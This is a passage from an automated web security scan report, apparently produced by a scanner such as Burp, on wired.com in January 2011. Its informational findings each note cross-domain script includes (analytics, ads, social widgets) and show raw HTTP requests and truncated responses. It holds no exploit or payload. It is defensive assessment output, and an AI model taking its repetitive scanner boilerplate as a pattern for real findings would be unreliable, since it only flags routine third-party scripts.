Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=240
Expires: Wed, 12 Jan 2011 15:45:21 GMT
Date: Wed, 12 Jan 2011 15:41:21 GMT
Content-Length: 30114
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.64. http://www.wired.com/services/corrections/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/corrections/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/corrections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=acbAOmv50QXE_5DZY461s; path=/
Content-Length: 54310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.65. http://www.wired.com/services/newsletters  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/newsletters

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/newsletters HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:04 GMT
Content-Length: 31938
Connection: close
Set-Cookie: JSESSIONID=acbKlmpgDx9HsdHJY461s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.66. http://www.wired.com/software/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /software/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /software/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=33
Expires: Wed, 12 Jan 2011 15:38:41 GMT
Date: Wed, 12 Jan 2011 15:38:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- Underwire Xrail Brightcove Player zindex fixed --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.67. http://www.wired.com/techbiz/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /techbiz/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /techbiz/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=525
Expires: Wed, 12 Jan 2011 15:47:05 GMT
Date: Wed, 12 Jan 2011 15:38:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- Underwire Xrail Brightcove Player zindex fixed --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.68. http://www.wired.com/thisdayintech/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /thisdayintech/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /thisdayintech/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:01:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:12 GMT
Date: Wed, 12 Jan 2011 15:40:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<div class="textwidget"><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.69. http://www.wired.com/threatlevel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:21:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:52 GMT
Date: Wed, 12 Jan 2011 15:27:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.70. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2006/04/reporter_vs_sub/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2006/04/reporter_vs_sub/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:06:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=600
Expires: Wed, 12 Jan 2011 15:37:41 GMT
Date: Wed, 12 Jan 2011 15:27:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.71. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2010/12/hacking-the-hacker-stereotypes/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2010/12/hacking-the-hacker-stereotypes/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 11:38:31 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=32
Expires: Wed, 12 Jan 2011 15:33:15 GMT
Date: Wed, 12 Jan 2011 15:32:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.72. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2010/12/transcending-the-human-diy-style/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2010/12/transcending-the-human-diy-style/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:54 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=51
Expires: Wed, 12 Jan 2011 15:33:23 GMT
Date: Wed, 12 Jan 2011 15:32:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.73. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2010/12/wiki-style-mapping-heads-to-sea/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:48:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=39
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:32:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.74. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/birgitta-jonsdottir/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2011/01/birgitta-jonsdottir/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:07:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=382
Expires: Wed, 12 Jan 2011 15:33:31 GMT
Date: Wed, 12 Jan 2011 15:27:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.75. http://www.wired.com/threatlevel/2011/01/codebreakers-death/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/codebreakers-death/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2011/01/codebreakers-death/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:44:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=380
Expires: Wed, 12 Jan 2011 15:33:31 GMT
Date: Wed, 12 Jan 2011 15:27:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/codebreakers-death/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.76. http://www.wired.com/threatlevel/2011/01/dubai-assassination/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/dubai-assassination/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2011/01/dubai-assassination/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 07:01:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=335
Expires: Wed, 12 Jan 2011 15:33:00 GMT
Date: Wed, 12 Jan 2011 15:27:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/dubai-assassination/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.77. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/secret-tanning-camera/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

